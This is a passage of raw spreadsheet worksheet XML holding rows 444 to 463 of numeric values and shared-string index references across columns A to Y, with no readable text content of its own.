        <v>608</v>
      </c>
      <c r="W444" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X444" s="12">
        <v>2</v>
      </c>
      <c r="Y444" s="12" t="s">
        <v>3537</v>
      </c>
    </row>
    <row r="445" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A445" s="12">
        <v>1763</v>
      </c>
      <c r="B445" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C445" s="12" t="s">
        <v>28357</v>
      </c>
      <c r="D445" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E445" s="12" t="s">
        <v>31426</v>
      </c>
      <c r="F445" s="12" t="s">
        <v>29727</v>
      </c>
      <c r="G445" s="12" t="s">
        <v>3539</v>
      </c>
      <c r="H445" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I445" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J445" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K445" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L445" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M445" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N445" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O445" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P445" s="12" t="s">
        <v>3434</v>
      </c>
      <c r="Q445" s="12">
        <v>2.4</v>
      </c>
      <c r="R445" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S445" s="12" t="s">
        <v>3540</v>
      </c>
      <c r="T445" s="12" t="s">
        <v>2398</v>
      </c>
      <c r="U445" s="12" t="s">
        <v>3045</v>
      </c>
      <c r="V445" s="12" t="s">
        <v>2864</v>
      </c>
      <c r="W445" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X445" s="12">
        <v>3</v>
      </c>
      <c r="Y445" s="12" t="s">
        <v>3541</v>
      </c>
    </row>
    <row r="446" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A446" s="12">
        <v>1764</v>
      </c>
      <c r="B446" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C446" s="12" t="s">
        <v>28708</v>
      </c>
      <c r="D446" s="12" t="s">
        <v>28709</v>
      </c>
      <c r="E446" s="12" t="s">
        <v>31430</v>
      </c>
      <c r="F446" s="12" t="s">
        <v>29727</v>
      </c>
      <c r="G446" s="12" t="s">
        <v>3542</v>
      </c>
      <c r="H446" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I446" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J446" s="12" t="s">
        <v>1299</v>
      </c>
      <c r="K446" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L446" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M446" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N446" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O446" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P446" s="12" t="s">
        <v>2528</v>
      </c>
      <c r="Q446" s="12">
        <v>2.6</v>
      </c>
      <c r="R446" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S446" s="12" t="s">
        <v>3543</v>
      </c>
      <c r="T446" s="12" t="s">
        <v>3544</v>
      </c>
      <c r="U446" s="12" t="s">
        <v>3545</v>
      </c>
      <c r="V446" s="12" t="s">
        <v>1302</v>
      </c>
      <c r="W446" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X446" s="12">
        <v>4</v>
      </c>
      <c r="Y446" s="12" t="s">
        <v>3546</v>
      </c>
    </row>
    <row r="447" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A447" s="12">
        <v>1766</v>
      </c>
      <c r="B447" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C447" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D447" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E447" s="12" t="s">
        <v>31426</v>
      </c>
      <c r="F447" s="12" t="s">
        <v>29727</v>
      </c>
      <c r="G447" s="12" t="s">
        <v>3547</v>
      </c>
      <c r="H447" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I447" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J447" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K447" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L447" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M447" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N447" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O447" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P447" s="12" t="s">
        <v>3366</v>
      </c>
      <c r="Q447" s="12">
        <v>2.4</v>
      </c>
      <c r="R447" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S447" s="12" t="s">
        <v>3548</v>
      </c>
      <c r="T447" s="12" t="s">
        <v>2398</v>
      </c>
      <c r="U447" s="12" t="s">
        <v>747</v>
      </c>
      <c r="V447" s="12" t="s">
        <v>2864</v>
      </c>
      <c r="W447" s="12" t="s">
        <v>3549</v>
      </c>
      <c r="X447" s="12">
        <v>24</v>
      </c>
      <c r="Y447" s="12" t="s">
        <v>3550</v>
      </c>
    </row>
    <row r="448" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A448" s="12">
        <v>1779</v>
      </c>
      <c r="B448" s="12" t="s">
        <v>28710</v>
      </c>
      <c r="C448" s="12" t="s">
        <v>28711</v>
      </c>
      <c r="D448" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F448" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G448" s="12" t="s">
        <v>3558</v>
      </c>
      <c r="H448" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I448" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J448" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K448" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L448" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M448" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N448" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O448" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P448" s="12" t="s">
        <v>3556</v>
      </c>
      <c r="Q448" s="12">
        <v>2.6</v>
      </c>
      <c r="R448" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S448" s="12" t="s">
        <v>3559</v>
      </c>
      <c r="T448" s="12" t="s">
        <v>2595</v>
      </c>
      <c r="U448" s="12" t="s">
        <v>3560</v>
      </c>
      <c r="V448" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W448" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X448" s="12">
        <v>4</v>
      </c>
      <c r="Y448" s="12" t="s">
        <v>3561</v>
      </c>
    </row>
    <row r="449" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A449" s="12">
        <v>1782</v>
      </c>
      <c r="B449" s="12" t="s">
        <v>28705</v>
      </c>
      <c r="C449" s="12" t="s">
        <v>28708</v>
      </c>
      <c r="D449" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E449" s="12" t="s">
        <v>31426</v>
      </c>
      <c r="F449" s="12" t="s">
        <v>29727</v>
      </c>
      <c r="G449" s="12" t="s">
        <v>3563</v>
      </c>
      <c r="H449" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I449" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J449" s="12" t="s">
        <v>103</v>
      </c>
      <c r="K449" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L449" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M449" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N449" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O449" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P449" s="12" t="s">
        <v>3022</v>
      </c>
      <c r="Q449" s="12">
        <v>2.4</v>
      </c>
      <c r="R449" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S449" s="12" t="s">
        <v>3564</v>
      </c>
      <c r="T449" s="12" t="s">
        <v>3565</v>
      </c>
      <c r="U449" s="12" t="s">
        <v>3566</v>
      </c>
      <c r="V449" s="12" t="s">
        <v>1174</v>
      </c>
      <c r="W449" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X449" s="12">
        <v>27</v>
      </c>
      <c r="Y449" s="12" t="s">
        <v>3567</v>
      </c>
    </row>
    <row r="450" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A450" s="12">
        <v>1783</v>
      </c>
      <c r="B450" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D450" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F450" s="12" t="s">
        <v>29727</v>
      </c>
      <c r="G450" s="12" t="s">
        <v>3568</v>
      </c>
      <c r="H450" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I450" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J450" s="12" t="s">
        <v>103</v>
      </c>
      <c r="K450" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L450" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M450" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N450" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O450" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P450" s="12" t="s">
        <v>2528</v>
      </c>
      <c r="Q450" s="12">
        <v>2.6</v>
      </c>
      <c r="R450" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S450" s="12" t="s">
        <v>3569</v>
      </c>
      <c r="T450" s="12" t="s">
        <v>482</v>
      </c>
      <c r="U450" s="12" t="s">
        <v>3570</v>
      </c>
      <c r="V450" s="12" t="s">
        <v>179</v>
      </c>
      <c r="W450" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X450" s="12">
        <v>4</v>
      </c>
      <c r="Y450" s="12" t="s">
        <v>3571</v>
      </c>
    </row>
    <row r="451" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A451" s="12">
        <v>1784</v>
      </c>
      <c r="B451" s="12" t="s">
        <v>28712</v>
      </c>
      <c r="D451" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F451" s="12" t="s">
        <v>29728</v>
      </c>
      <c r="G451" s="12" t="s">
        <v>3572</v>
      </c>
      <c r="H451" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I451" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J451" s="12" t="s">
        <v>1461</v>
      </c>
      <c r="K451" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L451" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M451" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N451" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O451" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P451" s="12" t="s">
        <v>2528</v>
      </c>
      <c r="Q451" s="12">
        <v>2.6</v>
      </c>
      <c r="R451" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S451" s="12" t="s">
        <v>3573</v>
      </c>
      <c r="T451" s="12" t="s">
        <v>3574</v>
      </c>
      <c r="U451" s="12" t="s">
        <v>3175</v>
      </c>
      <c r="V451" s="12" t="s">
        <v>1487</v>
      </c>
      <c r="W451" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X451" s="12">
        <v>1</v>
      </c>
      <c r="Y451" s="12" t="s">
        <v>3575</v>
      </c>
    </row>
    <row r="452" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A452" s="12">
        <v>1787</v>
      </c>
      <c r="B452" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C452" s="12" t="s">
        <v>29781</v>
      </c>
      <c r="D452" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E452" s="12" t="s">
        <v>31426</v>
      </c>
      <c r="F452" s="12" t="s">
        <v>29727</v>
      </c>
      <c r="G452" s="12" t="s">
        <v>3576</v>
      </c>
      <c r="H452" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I452" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J452" s="12" t="s">
        <v>356</v>
      </c>
      <c r="K452" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L452" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M452" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N452" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O452" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P452" s="12" t="s">
        <v>3577</v>
      </c>
      <c r="Q452" s="12">
        <v>2.4</v>
      </c>
      <c r="R452" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S452" s="12" t="s">
        <v>3578</v>
      </c>
      <c r="T452" s="12" t="s">
        <v>3579</v>
      </c>
      <c r="U452" s="12" t="s">
        <v>3580</v>
      </c>
      <c r="V452" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W452" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X452" s="12">
        <v>3</v>
      </c>
      <c r="Y452" s="12" t="s">
        <v>3581</v>
      </c>
    </row>
    <row r="453" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A453" s="12">
        <v>1797</v>
      </c>
      <c r="B453" s="12" t="s">
        <v>28710</v>
      </c>
      <c r="C453" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D453" s="12" t="s">
        <v>28713</v>
      </c>
      <c r="F453" s="12" t="s">
        <v>29727</v>
      </c>
      <c r="G453" s="12" t="s">
        <v>3591</v>
      </c>
      <c r="H453" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I453" s="12" t="s">
        <v>145</v>
      </c>
      <c r="J453" s="12" t="s">
        <v>941</v>
      </c>
      <c r="K453" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L453" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M453" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N453" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O453" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P453" s="12" t="s">
        <v>3592</v>
      </c>
      <c r="Q453" s="12">
        <v>2.6</v>
      </c>
      <c r="R453" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S453" s="12" t="s">
        <v>3593</v>
      </c>
      <c r="T453" s="12" t="s">
        <v>3594</v>
      </c>
      <c r="U453" s="12" t="s">
        <v>3595</v>
      </c>
      <c r="V453" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W453" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X453" s="12">
        <v>4</v>
      </c>
      <c r="Y453" s="12" t="s">
        <v>3596</v>
      </c>
    </row>
    <row r="454" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A454" s="12">
        <v>1822</v>
      </c>
      <c r="B454" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D454" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F454" s="12" t="s">
        <v>29742</v>
      </c>
      <c r="G454" s="12" t="s">
        <v>3606</v>
      </c>
      <c r="H454" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I454" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J454" s="12" t="s">
        <v>129</v>
      </c>
      <c r="K454" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L454" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M454" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N454" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O454" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P454" s="12" t="s">
        <v>3221</v>
      </c>
      <c r="Q454" s="12">
        <v>2.6</v>
      </c>
      <c r="R454" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S454" s="12" t="s">
        <v>3607</v>
      </c>
      <c r="T454" s="12" t="s">
        <v>552</v>
      </c>
      <c r="U454" s="12" t="s">
        <v>3608</v>
      </c>
      <c r="V454" s="12" t="s">
        <v>553</v>
      </c>
      <c r="W454" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X454" s="12">
        <v>38</v>
      </c>
      <c r="Y454" s="12" t="s">
        <v>3609</v>
      </c>
    </row>
    <row r="455" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A455" s="12">
        <v>1825</v>
      </c>
      <c r="B455" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D455" s="12" t="s">
        <v>28714</v>
      </c>
      <c r="F455" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G455" s="12" t="s">
        <v>3610</v>
      </c>
      <c r="H455" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I455" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J455" s="12" t="s">
        <v>96</v>
      </c>
      <c r="K455" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L455" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M455" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N455" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O455" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P455" s="12" t="s">
        <v>3221</v>
      </c>
      <c r="Q455" s="12">
        <v>2.6</v>
      </c>
      <c r="R455" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S455" s="12" t="s">
        <v>3611</v>
      </c>
      <c r="T455" s="12" t="s">
        <v>3612</v>
      </c>
      <c r="U455" s="12" t="s">
        <v>3613</v>
      </c>
      <c r="V455" s="12" t="s">
        <v>100</v>
      </c>
      <c r="W455" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X455" s="12">
        <v>7</v>
      </c>
      <c r="Y455" s="12" t="s">
        <v>3614</v>
      </c>
    </row>
    <row r="456" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A456" s="12">
        <v>1832</v>
      </c>
      <c r="B456" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C456" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D456" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F456" s="12" t="s">
        <v>29727</v>
      </c>
      <c r="G456" s="12" t="s">
        <v>3615</v>
      </c>
      <c r="H456" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I456" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J456" s="12" t="s">
        <v>14</v>
      </c>
      <c r="K456" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L456" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M456" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N456" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O456" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P456" s="12" t="s">
        <v>3221</v>
      </c>
      <c r="Q456" s="12">
        <v>2.6</v>
      </c>
      <c r="R456" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S456" s="12" t="s">
        <v>3616</v>
      </c>
      <c r="T456" s="12" t="s">
        <v>2409</v>
      </c>
      <c r="U456" s="12" t="s">
        <v>3617</v>
      </c>
      <c r="V456" s="12" t="s">
        <v>1472</v>
      </c>
      <c r="W456" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X456" s="12">
        <v>1</v>
      </c>
      <c r="Y456" s="12" t="s">
        <v>3618</v>
      </c>
    </row>
    <row r="457" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A457" s="12">
        <v>1833</v>
      </c>
      <c r="B457" s="12" t="s">
        <v>28715</v>
      </c>
      <c r="C457" s="12" t="s">
        <v>29780</v>
      </c>
      <c r="D457" s="12" t="s">
        <v>28716</v>
      </c>
      <c r="F457" s="12" t="s">
        <v>29727</v>
      </c>
      <c r="G457" s="12" t="s">
        <v>3619</v>
      </c>
      <c r="H457" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I457" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J457" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K457" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L457" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M457" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N457" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O457" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P457" s="12" t="s">
        <v>3327</v>
      </c>
      <c r="Q457" s="12">
        <v>2.6</v>
      </c>
      <c r="R457" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S457" s="12" t="s">
        <v>3620</v>
      </c>
      <c r="T457" s="12" t="s">
        <v>3621</v>
      </c>
      <c r="U457" s="12" t="s">
        <v>3622</v>
      </c>
      <c r="V457" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W457" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X457" s="12">
        <v>1</v>
      </c>
      <c r="Y457" s="12" t="s">
        <v>3623</v>
      </c>
    </row>
    <row r="458" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A458" s="12">
        <v>1838</v>
      </c>
      <c r="B458" s="12" t="s">
        <v>28717</v>
      </c>
      <c r="D458" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F458" s="12" t="s">
        <v>29727</v>
      </c>
      <c r="G458" s="12" t="s">
        <v>3624</v>
      </c>
      <c r="H458" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I458" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J458" s="12" t="s">
        <v>194</v>
      </c>
      <c r="K458" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L458" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M458" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N458" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O458" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P458" s="12" t="s">
        <v>3625</v>
      </c>
      <c r="Q458" s="12">
        <v>2.6</v>
      </c>
      <c r="R458" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S458" s="12" t="s">
        <v>3626</v>
      </c>
      <c r="T458" s="12" t="s">
        <v>3627</v>
      </c>
      <c r="U458" s="12" t="s">
        <v>3628</v>
      </c>
      <c r="V458" s="12" t="s">
        <v>197</v>
      </c>
      <c r="W458" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X458" s="12">
        <v>2</v>
      </c>
      <c r="Y458" s="12" t="s">
        <v>3629</v>
      </c>
    </row>
    <row r="459" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A459" s="12">
        <v>1846</v>
      </c>
      <c r="B459" s="12" t="s">
        <v>28718</v>
      </c>
      <c r="D459" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F459" s="12" t="s">
        <v>29727</v>
      </c>
      <c r="G459" s="12" t="s">
        <v>3630</v>
      </c>
      <c r="H459" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I459" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J459" s="12" t="s">
        <v>103</v>
      </c>
      <c r="K459" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L459" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M459" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N459" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O459" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P459" s="12" t="s">
        <v>3221</v>
      </c>
      <c r="Q459" s="12">
        <v>2.6</v>
      </c>
      <c r="R459" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S459" s="12" t="s">
        <v>3631</v>
      </c>
      <c r="T459" s="12" t="s">
        <v>3632</v>
      </c>
      <c r="U459" s="12" t="s">
        <v>3633</v>
      </c>
      <c r="V459" s="12" t="s">
        <v>1174</v>
      </c>
      <c r="W459" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X459" s="12">
        <v>1</v>
      </c>
      <c r="Y459" s="12" t="s">
        <v>3634</v>
      </c>
    </row>
    <row r="460" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A460" s="12">
        <v>1847</v>
      </c>
      <c r="B460" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C460" s="12" t="s">
        <v>28719</v>
      </c>
      <c r="D460" s="12" t="s">
        <v>28716</v>
      </c>
      <c r="F460" s="12" t="s">
        <v>29727</v>
      </c>
      <c r="G460" s="12" t="s">
        <v>3635</v>
      </c>
      <c r="H460" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I460" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J460" s="12" t="s">
        <v>1203</v>
      </c>
      <c r="K460" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L460" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M460" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N460" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O460" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P460" s="12" t="s">
        <v>3636</v>
      </c>
      <c r="Q460" s="12">
        <v>2.4</v>
      </c>
      <c r="R460" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S460" s="12" t="s">
        <v>3637</v>
      </c>
      <c r="T460" s="12" t="s">
        <v>3638</v>
      </c>
      <c r="U460" s="12" t="s">
        <v>3639</v>
      </c>
      <c r="V460" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W460" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X460" s="12">
        <v>9</v>
      </c>
      <c r="Y460" s="12" t="s">
        <v>3640</v>
      </c>
    </row>
    <row r="461" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A461" s="12">
        <v>1851</v>
      </c>
      <c r="B461" s="12" t="s">
        <v>28720</v>
      </c>
      <c r="D461" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F461" s="12" t="s">
        <v>29727</v>
      </c>
      <c r="G461" s="12" t="s">
        <v>3644</v>
      </c>
      <c r="H461" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I461" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J461" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K461" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L461" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M461" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N461" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O461" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P461" s="12" t="s">
        <v>3221</v>
      </c>
      <c r="Q461" s="12">
        <v>2.6</v>
      </c>
      <c r="R461" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S461" s="12" t="s">
        <v>3645</v>
      </c>
      <c r="T461" s="12" t="s">
        <v>3646</v>
      </c>
      <c r="U461" s="12" t="s">
        <v>3647</v>
      </c>
      <c r="V461" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W461" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X461" s="12">
        <v>8</v>
      </c>
      <c r="Y461" s="12" t="s">
        <v>3648</v>
      </c>
    </row>
    <row r="462" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A462" s="12">
        <v>1863</v>
      </c>
      <c r="B462" s="12" t="s">
        <v>28721</v>
      </c>
      <c r="D462" s="12" t="s">
        <v>28722</v>
      </c>
      <c r="E462" s="12" t="s">
        <v>31426</v>
      </c>
      <c r="F462" s="12" t="s">
        <v>29727</v>
      </c>
      <c r="G462" s="12" t="s">
        <v>3651</v>
      </c>
      <c r="H462" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I462" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J462" s="12" t="s">
        <v>181</v>
      </c>
      <c r="K462" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L462" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M462" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N462" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O462" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P462" s="12" t="s">
        <v>3434</v>
      </c>
      <c r="Q462" s="12">
        <v>2.4</v>
      </c>
      <c r="R462" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S462" s="12" t="s">
        <v>3652</v>
      </c>
      <c r="T462" s="12" t="s">
        <v>2398</v>
      </c>
      <c r="U462" s="12" t="s">
        <v>3653</v>
      </c>
      <c r="V462" s="12" t="s">
        <v>2398</v>
      </c>
      <c r="W462" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X462" s="12">
        <v>3</v>
      </c>
      <c r="Y462" s="12" t="s">
        <v>3654</v>
      </c>
    </row>
    <row r="463" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A463" s="12">
        <v>1865</v>
      </c>
      <c r="B463" s="12" t="s">
        <v>28723</v>
      </c>
      <c r="C463" s="12" t="s">
        <v>28724</v>
      </c>
      <c r="D463" s="12" t="s">
        <v>28725</v>
      </c>
      <c r="E463" s="12" t="s">
        <v>31426</v>
      </c>
      <c r="F463" s="12" t="s">
        <v>29727</v>
      </c>
      <c r="G463" s="12" t="s">
        <v>3655</v>
      </c>
      <c r="H463" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I463" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J463" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K463" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L463" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M463" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N463" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O463" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P463" s="12" t="s">
        <v>3221</v>
      </c>
      <c r="Q463" s="12">
        <v>2.6</v>
      </c>
      <c r="R463" s="12" t="s">
